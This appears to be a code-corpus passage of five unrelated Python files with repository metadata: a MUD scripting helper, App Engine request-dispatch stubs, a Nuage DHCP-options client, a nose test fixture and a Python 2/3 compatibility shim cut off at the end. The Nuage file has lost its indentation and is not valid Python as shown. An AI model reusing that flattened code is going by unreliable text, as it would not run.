"""Fichier contenant la fonction element."""
from primaires.scripting.fonction import Fonction
class ClasseFonction(Fonction):

    """Return the character's element."""

    @classmethod
    def init_types(cls):
        # Register the single accepted signature: one "Personnage" argument.
        cls.ajouter_types(cls.element_personnage, "Personnage")

    @staticmethod
    def element_personnage(personnage):
        """Return the character's element, or "aucun".

        The returned element is expected to be "eau", "terre", "feu"
        or "air".  If the character has no element defined, returns
        "aucun" (the runtime string stays French; scripts compare
        against it).
        """
        if personnage.element:
            return personnage.element

        return "aucun"
|
vlegoff/tsunami
|
src/secondaires/magie/fonctions/element.py
|
Python
|
bsd-3-clause
| 2,224
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Allows API stubs to access request and system state when handling calls.
Certain API stubs require access to information about the request that triggered
the API call (e.g. user_service_stub needs to know the host name of the request
to generate continuation URLs) or system state (e.g. modules_stub).
Other stubs (e.g. taskqueue_stub, channel_stub) need to be able to dispatch
requests within the system.
An instance of a RequestInfo subclass is passed to stubs that require these
capabilities.
"""
import logging
import operator
import os
import urllib
class Error(Exception):
  """Base class for all exceptions raised by this module."""
  pass
class ModuleDoesNotExistError(Error):
  """Raised when a named module is not known to the dispatcher."""
class VersionDoesNotExistError(Error):
  """Raised when a named version does not exist for the given module."""
class InvalidInstanceIdError(Error):
  """Raised when an instance ID is invalid for the given module/version."""
class NotSupportedWithAutoScalingError(Error):
  """Raised when an operation requires manual scaling but the module auto-scales."""
class ModuleAlreadyStartedError(Error):
  """Raised when starting a module that is already started."""
class ModuleAlreadyStoppedError(Error):
  """Raised when stopping a module that is already stopped."""
class BackgroundThreadLimitReachedError(Error):
  """Raised when an instance cannot accept another background thread."""
class ResponseTuple(tuple):
  """Immutable (status, headers, content) triple describing an HTTP response.

  A hand-rolled namedtuple: positional access, named attribute access and
  the usual _make/_asdict/_replace helpers are all supported.
  """

  __slots__ = ()

  _fields = ('status', 'headers', 'content')

  def __new__(cls, status, headers, content):
    # Build directly on the tuple base class; __slots__ keeps instances
    # free of a per-instance __dict__.
    return tuple.__new__(cls, (status, headers, content))

  @classmethod
  def _make(cls, iterable, new=tuple.__new__, len=len):
    """Makes a ResponseTuple from any length-3 iterable."""
    made = new(cls, iterable)
    if len(made) != 3:
      raise TypeError('Expected 3 arguments, got %d' % len(made))
    return made

  def _asdict(self):
    """Returns a dict mapping field names to values."""
    return dict(zip(self._fields, self))

  __dict__ = property(_asdict)

  def _replace(self, **kwds):
    """Returns a copy with the named fields replaced by new values."""
    # pop() consumes each recognized field; anything left over is bogus.
    replaced = self._make(
        map(kwds.pop, ('status', 'headers', 'content'), self))
    if kwds:
      raise ValueError('Got unexpected field names: %r' % kwds.keys())
    return replaced

  def __repr__(self):
    return 'ResponseTuple(status=%r, headers=%r, content=%r)' % self

  def __getnewargs__(self):
    # Supports copy/pickle by re-supplying the constructor arguments.
    return tuple(self)

  status = property(operator.itemgetter(0), doc='Alias for field number 0')
  headers = property(operator.itemgetter(1), doc='Alias for field number 1')
  content = property(operator.itemgetter(2), doc='Alias for field number 2')
class Dispatcher(object):
  """Provides information about and dispatches requests to modules.

  This is an abstract interface: every method raises NotImplementedError
  and must be overridden.  Concrete implementations let API stubs
  enumerate modules and versions, resolve hostnames, control
  manually-scaled modules, schedule events and route HTTP requests
  within the running system.
  """

  def get_module_names(self):
    """Returns a list of str containing the names of all modules."""
    raise NotImplementedError()

  def get_versions(self, module):
    """Returns a list of str naming the versions of a module.

    Args:
      module: A str containing the name of the module.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
    """
    raise NotImplementedError()

  def get_default_version(self, module):
    """Returns a str naming the default version of a module.

    Args:
      module: A str containing the name of the module.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
    """
    raise NotImplementedError()

  def get_hostname(self, module, version, instance=None):
    """Returns the hostname for a (module, version, instance) tuple.

    When instance is given, the hostname addresses that particular
    instance; otherwise it addresses the load-balanced version.

    Args:
      module: A str containing the name of the module.
      version: A str containing the version.
      instance: An optional str containing the instance ID.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      InvalidInstanceIdError: The instance ID is not valid for the
          module/version or the module/version uses automatic scaling.
    """
    raise NotImplementedError()

  def set_num_instances(self, module, version, instances):
    """Sets how many instances run for a manually-scaled module version.

    Args:
      module: A str containing the name of the module.
      version: A str containing the version.
      instances: An int containing the number of instances to run.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: The provided module/version uses
          automatic scaling.
    """
    raise NotImplementedError()

  def get_num_instances(self, module, version):
    """Gets how many instances run for a manually-scaled module version.

    Args:
      module: A str containing the name of the module.
      version: A str containing the version.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: The provided module/version uses
          automatic scaling.
    """
    raise NotImplementedError()

  def start_module(self, module, version):
    """Starts a module version.

    Args:
      module: A str containing the name of the module.
      version: A str containing the version.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: The provided module/version uses
          automatic scaling.
    """
    raise NotImplementedError()

  def stop_module(self, module, version):
    """Stops a module version.

    Args:
      module: A str containing the name of the module.
      version: A str containing the version.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: The provided module/version uses
          automatic scaling.
    """
    raise NotImplementedError()

  def add_event(self, runnable, eta, service=None, event_id=None):
    """Schedules a callable to run at the given time.

    Args:
      runnable: A callable object to call at the specified time.
      eta: An int containing the time to run the event, in seconds since
          the epoch.
      service: A str naming the service that owns this event; should be
          set whenever event_id is set.
      event_id: A str identifying the event; if set it can be passed to
          update_event to reschedule the event.
    """
    raise NotImplementedError()

  def update_event(self, eta, service, event_id):
    """Reschedules a previously-added event.

    Args:
      eta: An int containing the time to run the event, in seconds since
          the epoch.
      service: A str naming the service that owns this event.
      event_id: A str identifying the event to update.
    """
    raise NotImplementedError()

  def add_request(self, method, relative_url, headers, body, source_ip,
                  module_name=None, version=None, instance_id=None):
    """Processes an HTTP request synchronously.

    Args:
      method: A str containing the HTTP method of the request.
      relative_url: A str containing path and query string of the request.
      headers: A list of (key, value) tuples where key and value are both
          str.
      body: A str containing the request body.
      source_ip: The source ip address for the request.
      module_name: An optional str naming the module to service this
          request; defaults to the default module.
      version: An optional str naming the version to service this
          request; defaults to the default version.
      instance_id: An optional str naming the instance to service this
          request; defaults to normal load-balancing.

    Returns:
      A ResponseTuple containing the response information for the HTTP
      request.
    """
    raise NotImplementedError()

  def add_async_request(self, method, relative_url, headers, body, source_ip,
                        module_name=None, version=None, instance_id=None):
    """Dispatches an HTTP request asynchronously (no response returned).

    Args:
      method: A str containing the HTTP method of the request.
      relative_url: A str containing path and query string of the request.
      headers: A list of (key, value) tuples where key and value are both
          str.
      body: A str containing the request body.
      source_ip: The source ip address for the request.
      module_name: An optional str naming the module to service this
          request; defaults to the default module.
      version: An optional str naming the version to service this
          request; defaults to the default version.
      instance_id: An optional str naming the instance to service this
          request; defaults to normal load-balancing.
    """
    raise NotImplementedError()

  def send_background_request(self, module_name, version, instance,
                              background_request_id):
    """Dispatches a background thread request to a specific instance.

    Args:
      module_name: A str naming the module to service this request.
      version: A str naming the version to service this request.
      instance: The instance to service this request.
      background_request_id: A str containing the unique background
          thread request identifier.

    Raises:
      NotSupportedWithAutoScalingError: The provided module/version uses
          automatic scaling.
      BackgroundThreadLimitReachedError: The instance is at its
          background thread capacity.
    """
    raise NotImplementedError()
class _LocalFakeDispatcher(Dispatcher):
  """A fake Dispatcher implementation usable by tests.

  Lookups are served from in-memory mappings supplied at construction
  time.  Instance control operations behave like auto-scaling modules
  (they always raise NotSupportedWithAutoScalingError), and request
  dispatching is not supported.
  """

  def __init__(self,
               module_names=None,
               module_name_to_versions=None,
               module_name_to_default_versions=None,
               module_name_to_version_to_hostname=None):
    super(_LocalFakeDispatcher, self).__init__()
    # Each mapping falls back to a single "default" module with one
    # version "1" served on localhost:8080.
    self._module_names = (
        ['default'] if module_names is None else module_names)
    self._module_name_to_versions = (
        {'default': ['1']} if module_name_to_versions is None
        else module_name_to_versions)
    self._module_name_to_default_versions = (
        {'default': '1'} if module_name_to_default_versions is None
        else module_name_to_default_versions)
    self._module_name_to_version_to_hostname = (
        {'default': {'1': 'localhost:8080'}}
        if module_name_to_version_to_hostname is None
        else module_name_to_version_to_hostname)

  @staticmethod
  def _lookup(mapping, key, error_class):
    """Returns mapping[key], raising error_class() when key is absent."""
    if key not in mapping:
      raise error_class()
    return mapping[key]

  def _check_module_and_version(self, module, version):
    """Validates that module and version exist in the configured data."""
    known_versions = self._lookup(self._module_name_to_versions, module,
                                  ModuleDoesNotExistError)
    if version not in known_versions:
      raise VersionDoesNotExistError()

  def get_module_names(self):
    """Returns a list of module names."""
    return self._module_names

  def get_versions(self, module):
    """Returns a list of str naming the versions of a module.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
    """
    return self._lookup(self._module_name_to_versions, module,
                        ModuleDoesNotExistError)

  def get_default_version(self, module):
    """Returns a str naming the default version of a module.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
    """
    return self._lookup(self._module_name_to_default_versions, module,
                        ModuleDoesNotExistError)

  def get_hostname(self, module, version, instance=None):
    """Returns the hostname for a (module, version, instance) tuple.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      InvalidInstanceIdError: An instance was requested; this fake only
          models load-balanced hostnames.
    """
    version_to_hostname = self._lookup(
        self._module_name_to_version_to_hostname, module,
        ModuleDoesNotExistError)
    hostname = self._lookup(version_to_hostname, version,
                            VersionDoesNotExistError)
    if instance:
      raise InvalidInstanceIdError()
    return hostname

  def set_num_instances(self, module, version, instances):
    """Unsupported: the fake behaves like an auto-scaling module.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: Always, once module/version are
          validated.
    """
    self._check_module_and_version(module, version)
    raise NotSupportedWithAutoScalingError()

  def get_num_instances(self, module, version):
    """Unsupported: the fake behaves like an auto-scaling module.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: Always, once module/version are
          validated.
    """
    self._check_module_and_version(module, version)
    raise NotSupportedWithAutoScalingError()

  def start_module(self, module, version):
    """Unsupported: the fake behaves like an auto-scaling module.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: Always, once module/version are
          validated.
    """
    self._check_module_and_version(module, version)
    raise NotSupportedWithAutoScalingError()

  def stop_module(self, module, version):
    """Unsupported: the fake behaves like an auto-scaling module.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: Always, once module/version are
          validated.
    """
    self._check_module_and_version(module, version)
    raise NotSupportedWithAutoScalingError()

  def add_event(self, runnable, eta, service=None, event_id=None):
    """Unsupported: only logs a warning (the event is dropped)."""
    logging.warning('Scheduled events are not supported with '
                    '_LocalFakeDispatcher')

  def update_event(self, eta, service, event_id):
    """Unsupported: only logs a warning (the event is not rescheduled)."""
    logging.warning('Scheduled events are not supported with '
                    '_LocalFakeDispatcher')

  def add_request(self, method, relative_url, headers, body, source_ip,
                  module_name=None, version=None, instance_id=None):
    """Unsupported: logs a warning and returns a 501 response.

    Returns:
      A ResponseTuple with status '501 Not Implemented', no headers and
      an empty body.
    """
    logging.warning('Request dispatching is not supported with '
                    '_LocalFakeDispatcher')
    return ResponseTuple('501 Not Implemented', [], '')

  def add_async_request(self, method, relative_url, headers, body, source_ip,
                        module_name=None, version=None, instance_id=None):
    """Unsupported: only logs a warning (the request is dropped)."""
    logging.warning('Request dispatching is not supported with '
                    '_LocalFakeDispatcher')

  def send_background_request(self, module_name, version, instance,
                              background_request_id):
    """Unsupported: logs a warning then reports the thread limit reached.

    Raises:
      BackgroundThreadLimitReachedError: Always.
    """
    logging.warning('Request dispatching is not supported with '
                    '_LocalFakeDispatcher')
    raise BackgroundThreadLimitReachedError()
# Module-level singleton returned by _LocalRequestInfo.get_dispatcher().
_local_dispatcher = _LocalFakeDispatcher()
class RequestInfo(object):
  """Allows stubs to lookup state linked to the request making the API call.

  Abstract interface: every method raises NotImplementedError and must be
  overridden.
  """

  def get_request_url(self, request_id):
    """Returns the URL of the request, e.g. 'http://localhost:8080/foo?bar=baz'.

    Args:
      request_id: The string id of the request making the API call.

    Returns:
      The URL of the request as a string.
    """
    raise NotImplementedError()

  def get_request_environ(self, request_id):
    """Returns a dict containing the WSGI environ for the request."""
    raise NotImplementedError()

  def get_module(self, request_id):
    """Returns a str naming the module serving this request.

    Args:
      request_id: The string id of the request making the API call.
    """
    raise NotImplementedError()

  def get_version(self, request_id):
    """Returns a str naming the version serving this request.

    Args:
      request_id: The string id of the request making the API call.
    """
    raise NotImplementedError()

  def get_instance(self, request_id):
    """Returns an opaque representation of the serving instance.

    The returned value should only be passed to dispatcher methods that
    expect an instance.

    Args:
      request_id: The string id of the request making the API call.
    """
    raise NotImplementedError()

  def get_dispatcher(self):
    """Returns the Dispatcher instance."""
    raise NotImplementedError()
class _LocalRequestInfo(RequestInfo):
  """Lookup information about a request using environment variables."""

  def get_request_url(self, request_id):
    """Returns the URL of the request, e.g. 'http://localhost:8080/foo?bar=baz'.

    Args:
      request_id: The string id of the request making the API call.

    Returns:
      The URL of the request as a string.
    """
    environ = os.environ
    host = environ.get('HTTP_HOST')
    if host is None:
      # No Host header: reconstruct from the CGI server variables,
      # omitting the port only when it is the default HTTP port.
      host = environ['SERVER_NAME']
      port = environ['SERVER_PORT']
      if port != '80':
        host = '%s:%s' % (host, port)
    pieces = ['http://', host, urllib.quote(environ.get('PATH_INFO', '/'))]
    query_string = environ.get('QUERY_STRING')
    if query_string:
      pieces.append('?' + query_string)
    return ''.join(pieces)

  def get_request_environ(self, request_id):
    """Returns a dict containing the WSGI environ for the request."""
    return os.environ

  def get_module(self, request_id):
    """Returns the name of the module serving this request.

    Always 'default' for the local environment.
    """
    return 'default'

  def get_version(self, request_id):
    """Returns the version of the module serving this request.

    Always '1' for the local environment.
    """
    return '1'

  def get_instance(self, request_id):
    """Returns an opaque, fresh object standing in for the instance."""
    return object()

  def get_dispatcher(self):
    """Returns the module-level fake Dispatcher singleton."""
    return _local_dispatcher
# Module-level singleton exposing environment-variable based request info.
_local_request_info = _LocalRequestInfo()
|
yencarnacion/jaikuengine
|
.google_appengine/google/appengine/api/request_info.py
|
Python
|
apache-2.0
| 24,848
|
# Copyright 2016 NOKIA
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import netaddr
from nuage_neutron.vsdclient.common import cms_id_helper
from nuage_neutron.vsdclient.common import constants
from nuage_neutron.vsdclient.common import helper
from nuage_neutron.vsdclient.common import nuagelib
from nuage_neutron.vsdclient import restproxy
# Indexed first by ip_version (4 or 6), then by option name
# (see NuageDhcpOptions._get_dhcp_template below).
DHCP_OPTIONS = constants.DHCP_OPTIONS
LOG = logging.getLogger(__name__)
class NuageDhcpOptions(object):
def __init__(self, restproxy_server):
self.restproxy = restproxy_server
@staticmethod
def _get_dhcp_template(ip_version, _value, _length, _type):
return {
"value": _value,
"length": _length,
"type": DHCP_OPTIONS[ip_version][_type]
}
@staticmethod
def _get_extra_dhcp_template(_value, _type, _external_id):
return {
"actualValues": _value,
"actualType": _type,
"externalID": _external_id
}
def create_nuage_dhcp(self, subnet, parent_id=None, network_type=None):
"""Function: create_nuage_dhcp
Creates the nuage DHCP options on a l2 only domain and domain/subnet
subnet : neutron subnet on which to create the dhcpoptions
parent_id : Nuage l2 only domain or dom/subnet ID
network_type : l2 only domain or domain/subnet
"""
LOG.debug('create_nuage_dhcp() for resource %s '
'network type %s', parent_id, network_type)
opts_todo = []
ip_version = subnet['ip_version']
dhcp_options = DHCP_OPTIONS[ip_version]
# ipv4 and ipv6
if subnet.get('dns_nameservers'):
opts_todo.append(dhcp_options['dns_nameservers'])
# ipv4 only
if ip_version == 4:
if subnet.get('host_routes'):
opts_todo.append(
dhcp_options['classless-static-route'])
opts_todo.append(
dhcp_options['microsoft-classless-static-route'])
if (subnet.get('gateway_ip') and
network_type == constants.NETWORK_TYPE_L2):
opts_todo.append(
dhcp_options['gateway_ip'])
for opt in opts_todo:
self._create_nuage_dhcp_options(subnet,
parent_id,
network_type,
opt)
def clear_nuage_dhcp_for_ip_version(self, ip_version, parent_id,
network_type):
"""Function: clear_nuage_dhcp_for_ip_version
Clears the dhcp options for the specified ip_version on the l2domain
or l3 subnet.
:param ip_version: 4 or 6
:param parent_id: l2domain_id or domainsubnet_id
:param network_type: NETWORK_TYPE_L2 or NETWORK_TYPE_L3
:return: None
"""
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
if network_type == constants.NETWORK_TYPE_L2:
resource = nuage_dhcp_options.resource_by_l2domainid(parent_id)
else:
resource = nuage_dhcp_options.resource_by_subnetid(parent_id)
dhcptions = self.restproxy.get(resource)
for option in dhcptions:
self.restproxy.delete(
nuage_dhcp_options.dhcp_resource(option['ID']))
def update_nuage_dhcp(self, subnet, parent_id=None,
network_type=None):
"""Function: update_nuage_dhcp
Update the nuage DHCP options on a l2 only domain and domain/subnet
subnet : neutron subnet on which to updates the dhcpoptions
parent_id : Nuage l2 only domain or dom/subnet ID
network_type : l2 only domain or domain/subnet
"""
LOG.debug('update_nuage_dhcp() for resource %s '
'network type %s', parent_id, network_type)
"""
In case of update, we need to delete the objects
only if the subnet has them as empty list otherwise
let create method take care of rest.
"""
opts_todo = []
ip_version = subnet['ip_version']
dhcp_options = DHCP_OPTIONS[ip_version]
# ipv4 and ipv6
if ('dns_nameservers' in subnet and
not subnet['dns_nameservers']):
opts_todo.append(dhcp_options['dns_nameservers'])
# ipv4 only
if ip_version == 4:
if ('host_routes' in subnet and
not subnet['host_routes']):
opts_todo.append(
dhcp_options['classless-static-route'])
opts_todo.append(
dhcp_options['microsoft-classless-static-route'])
if ('gateway_ip' in subnet and
not subnet['gateway_ip'] and
network_type == constants.NETWORK_TYPE_L2):
opts_todo.append(dhcp_options['gateway_ip'])
for opt in opts_todo:
self._delete_nuage_dhcp_option(
parent_id, network_type, ip_version, opt)
self.create_nuage_dhcp(subnet, parent_id, network_type)
def delete_vport_nuage_dhcp(self, dhcp_opt, vport_id):
"""Function: delete_nuage_extra_dhcp_option
Delete the nuage DHCP options for the Vports
dhcp_opt : DHCP opt to delete from VSD.
vport_id : Vport on which to delete the DHCP option.
"""
LOG.debug('delete nuage dhcp option for resource %s', vport_id)
ip_version = dhcp_opt['ip_version']
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
dhcp_id = self._check_dhcp_option_exists(
vport_id, constants.VPORT, ip_version,
helper.convert_hex_for_vsd(hex(dhcp_opt['opt_name'])))
resp = self.restproxy.delete(nuage_dhcp_options.dhcp_resource(dhcp_id))
return resp
def create_update_extra_dhcp_option_on_vport(self, extra_dhcp_opt,
parent_id, external_id):
"""Function: create_update_extra_dhcp_option_on_vport
Creates/Updates nuage DHCP options on Vport
extra_dhcp_opt : extra DHCP options details to be configured.
parent_id : Vport on which to create the DHCP options.
external_id : neutron portID on which we create the DHCP options.
"""
LOG.debug('Create/Update nuage dhcp option for '
'resource %s', parent_id)
ip_version = extra_dhcp_opt['ip_version']
option_number = extra_dhcp_opt['opt_name']
option_value = extra_dhcp_opt['opt_value']
external_id = cms_id_helper.get_vsd_external_id(external_id)
length = 0
opt_value = ""
dhcp_id = self._check_dhcp_option_exists(
parent_id, constants.VPORT, ip_version,
helper.convert_hex_for_vsd(hex(option_number)))
if option_number in constants.PRCS_DHCP_OPT_AS_RAW_HEX[ip_version]:
try:
for value in option_value:
val = helper.convert_hex_for_vsd(value)
opt_value = opt_value + val
length = len(val) + length
except Exception as e:
raise e
if length:
length = helper.convert_hex_for_vsd(hex(length // 2))
data = {"length": length}
opt_type = helper.convert_hex_for_vsd(hex(option_number))
data['type'] = opt_type
data["value"] = opt_value
data["externalID"] = external_id
else:
data = self._get_extra_dhcp_template(option_value,
option_number, external_id)
return self._set_nuage_dhcp_options(parent_id, ip_version, data,
dhcp_id, constants.VPORT)
def delete_nuage_extra_dhcp_option(self, dhcp_id, ip_version, on_rollback):
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
try:
self.restproxy.delete(nuage_dhcp_options.dhcp_resource(dhcp_id))
except restproxy.RESTProxyError as e:
if on_rollback:
e.msg = ("Rollback also failed due to the exception: " +
str(e))
raise
def _create_nuage_dhcp_options(self, subnet, resource_id,
resource_type, dhcp_option):
"""Function: create_nuage_dhcp_options
Creates the nuage DHCP options on a l2 only domain and domain/subnet
subnet : openstack subnet
resource_id : Nuage l2 only domain or dom/subnetID
resource_type : l2 domain or domain/subnet
dhcp_option : Type of the DHCP option
"""
LOG.debug('_create_nuage_dhcp_options() for resource %s', resource_id)
ip_version = subnet['ip_version']
dhcp_options = DHCP_OPTIONS[ip_version]
dhcp_id = self._check_dhcp_option_exists(resource_id, resource_type,
ip_version, dhcp_option)
if dhcp_option == dhcp_options['dns_nameservers']\
and subnet['dns_nameservers']:
data = self._get_dns_tmpl(ip_version, subnet['dns_nameservers'])
elif ip_version == 4:
if (dhcp_option == dhcp_options[
'microsoft-classless-static-route'] and
subnet['host_routes']):
data = self._get_static_rte_tmpl(
ip_version,
subnet['host_routes'], 'microsoft-classless-static-route')
elif (dhcp_option == dhcp_options['classless-static-route'] and
subnet['host_routes']):
data = self._get_static_rte_tmpl(
ip_version,
subnet['host_routes'], 'classless-static-route')
elif (dhcp_option == dhcp_options['gateway_ip'] and
subnet['gateway_ip']):
data = self._get_gateway_ip_tmpl(
ip_version, subnet['gateway_ip'])
else:
raise Exception("Unknown DHCPv4 option")
else:
raise Exception("Unknown DHCP option")
data['externalID'] = helper.get_external_id_based_on_subnet_id(subnet)
self._set_nuage_dhcp_options(resource_id, ip_version, data,
dhcp_id, resource_type)
def _set_nuage_dhcp_options(self, resource_id, ip_version,
data, dhcp_id=False, resource_type=None):
"""Function: set_nuage_dhcp_options
Sets the nuage DHCP options on a l2 only domain and subnet/port.
resource_id : Nuage l2 only domian or dom/subnetID or VportID
ip_version : IP version of the option
data : data the user is going to apply as dhcp_option
dhcp_id : Nuage DHCP option ID
l2_dom : l2 only domain or domain/subnet
"""
LOG.debug('_set_nuage_dhcp_options() for resource %s', resource_id)
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
if data:
if dhcp_id:
# dhcp option already set for this l2domain. We do a PUT
# operation with the new data
del data["externalID"]
return self.restproxy.put(
nuage_dhcp_options.dhcp_resource(dhcp_id),
data)
else:
if resource_type == constants.VPORT:
# POST the dhcp options for the Vport
return self.restproxy.post(
nuage_dhcp_options.resource_by_vportid(resource_id),
data)
elif resource_type == constants.NETWORK_TYPE_L2:
# POST the dhcp options for the l2only domain
return self.restproxy.post(
nuage_dhcp_options.resource_by_l2domainid(resource_id),
data)
else:
# POST the dhcp options for the domain/subnet
return self.restproxy.post(
nuage_dhcp_options.resource_by_subnetid(resource_id),
data)
elif resource_type != constants.VPORT:
return self.restproxy.delete(
nuage_dhcp_options.dhcp_resource(dhcp_id))
def _delete_nuage_dhcp_option(self, subnet_id, isl2dom, ip_version,
dhcp_type):
"""Function: _delete_nuage_dhcp_option
Deletes the nuage DHCP options on a l2 only doamain and domain/subnet
subnet_id : Nuage l2 only domian or dom/subnet ID
isl2dom : l2 only domain or domain/subnet
ip_version : IP version of the option
dhcp_type : Type of the DHCP option
"""
LOG.debug('_delete_nuage_dhcp_option() called for subnet %s '
'dhcp_type %s', subnet_id, dhcp_type)
# Check if the dhcp options exists of type dhcp_type on this l2/l3
# subnet
dhcp_id = self._check_dhcp_option_exists(subnet_id, isl2dom,
ip_version, dhcp_type)
if dhcp_id:
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
self.restproxy.delete(nuage_dhcp_options.dhcp_resource(dhcp_id))
def _check_dhcp_option_exists(self, resource_id, resource_type,
ip_version, dhcp_type):
"""Function: _check_dhcp_option_exists
Check if the dhcp option exists
resource_id: vsd-id of the resource
resource_type : If the resource is a l2/l3/vport
ip_version : IP version of the option
dhcp_type : Type of the DHCP option
"""
LOG.debug('_check_dhcp_option_exists() for resource %s', resource_id)
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
if resource_type == constants.VPORT:
dhcp_options = self.restproxy.get(
nuage_dhcp_options.resource_by_vportid(resource_id))
elif resource_type == constants.NETWORK_TYPE_L2:
dhcp_options = self.restproxy.get(
nuage_dhcp_options.resource_by_l2domainid(resource_id))
else:
dhcp_options = self.restproxy.get(
nuage_dhcp_options.resource_by_subnetid(resource_id))
return NuageDhcpOptions._is_option_already_present(dhcp_options,
dhcp_type)
@staticmethod
def _is_option_already_present(dhcpoptions, dhcp_type):
# we need to verify that there is a same option already present.
for dhcp_item in dhcpoptions:
if dhcp_item['type'] == dhcp_type:
return dhcp_item['ID']
return None
def _get_dns_tmpl(self, ip_version, dns_list):
_dns_length = format(4 * len(dns_list), '02x')
_dns = ""
for dns_item in dns_list:
_dns = _dns + self.get_ip_hex_value(netaddr.IPNetwork(dns_item).ip)
return NuageDhcpOptions._get_dhcp_template(
ip_version, _dns, _dns_length, 'dns_nameservers')
# TODO(team): Will move this util function to common utils
@staticmethod
def get_ip_hex_value(ip):
return str(hex(ip)[2:]).zfill(8)
    def _get_static_rte_tmpl(self, ip_version,
                             static_routes, static_route_type):
        """Build the DHCP payload encoding classless static routes.

        Each route is packed as <prefixlen><truncated dest><nexthop> in hex;
        the destination is truncated to its significant netmask octets.
        """
        # minimum is 5, multiplied by the number of routes
        # (1 byte prefix length + 4 bytes next hop per route)
        _length_d = len(static_routes) * 5
        _data = ""
        for static_route in static_routes:
            _ip = netaddr.IPNetwork(static_route['destination'])
            # length of the subnet
            # counts the non-zero octets of the netmask, i.e. how many
            # destination octets are actually encoded
            _netmask_length = \
                sum([1 for a in str(_ip.netmask).split('.') if int(a) > 0])
            _length_d = _length_d + _netmask_length
            cidr_prefix = format(_ip.prefixlen, '02x')
            # need to do that to get the correction padding for length
            # (two hex chars per encoded octet)
            cidr_ip = self.get_ip_hex_value(_ip.ip)[:_netmask_length * 2]
            _ip = netaddr.IPAddress(static_route['nexthop'])
            nexthop_ip = self.get_ip_hex_value(_ip)
            _data += "%s%s%s" % (cidr_prefix, cidr_ip, nexthop_ip)
        _length = format(_length_d, '02x')
        return NuageDhcpOptions._get_dhcp_template(
            ip_version, _data, _length, static_route_type)
def _get_gateway_ip_tmpl(self, ip_version, gateway_ip):
_length = format(4, '02x')
_ip = netaddr.IPAddress(gateway_ip)
_data = self.get_ip_hex_value(_ip)
return NuageDhcpOptions._get_dhcp_template(
ip_version, _data, _length, 'gateway_ip')
|
nuagenetworks/nuage-openstack-neutron
|
nuage_neutron/vsdclient/resources/dhcpoptions.py
|
Python
|
apache-2.0
| 17,366
|
from nose.exc import SkipTest
def test_ok():
    # Fixture: deliberately passing test for the xunit plugin's report checks.
    pass
def test_err():
    # Fixture: deliberately errors; the message is matched by the plugin test.
    raise Exception("oh no")
def test_fail():
    # Fixture: deliberately fails via an assertion.
    assert False, "bye"
def test_skip():
    # Fixture: deliberately skipped via nose's SkipTest mechanism.
    raise SkipTest("not me")
|
DESHRAJ/fjord
|
vendor/packages/nose/functional_tests/doc_tests/test_xunit_plugin/support/test_skip.py
|
Python
|
bsd-3-clause
| 190
|
"""
Python 3 compatibility tools.
"""
__all__ = ['bytes', 'asbytes', 'isfileobj', 'getexception', 'strchar',
'unicode', 'asunicode', 'asbytes_nested', 'asunicode_nested',
'asstr', 'open_latin1']
import sys
if sys.version_info[0] >= 3:
    import io
    # Python 3: the builtin types already have the desired semantics; just
    # re-export them under the compat names used by the rest of the package.
    bytes = bytes
    unicode = str
    asunicode = str
    def asbytes(s):
        # str -> latin1-encoded bytes; bytes pass through untouched.
        if isinstance(s, bytes):
            return s
        return s.encode('latin1')
    def asstr(s):
        if isinstance(s, str):
            return s
        return s.decode('latin1')
    def isfileobj(f):
        return isinstance(f, io.FileIO)
    def open_latin1(filename, mode='r'):
        return open(filename, mode=mode, encoding='iso-8859-1')
    strchar = 'U'
    from io import BytesIO, StringIO #statsmodels
else:
    # Python 2: str is already a byte string.
    bytes = str
    unicode = unicode
    asbytes = str
    asstr = str
    strchar = 'S'
    def isfileobj(f):
        return isinstance(f, file)
    def asunicode(s):
        if isinstance(s, unicode):
            return s
        return s.decode('ascii')
    def open_latin1(filename, mode='r'):
        return open(filename, mode=mode)
    from StringIO import StringIO
    BytesIO = StringIO
def getexception():
    """Return the exception instance currently being handled."""
    exc_type, exc_value, exc_traceback = sys.exc_info()
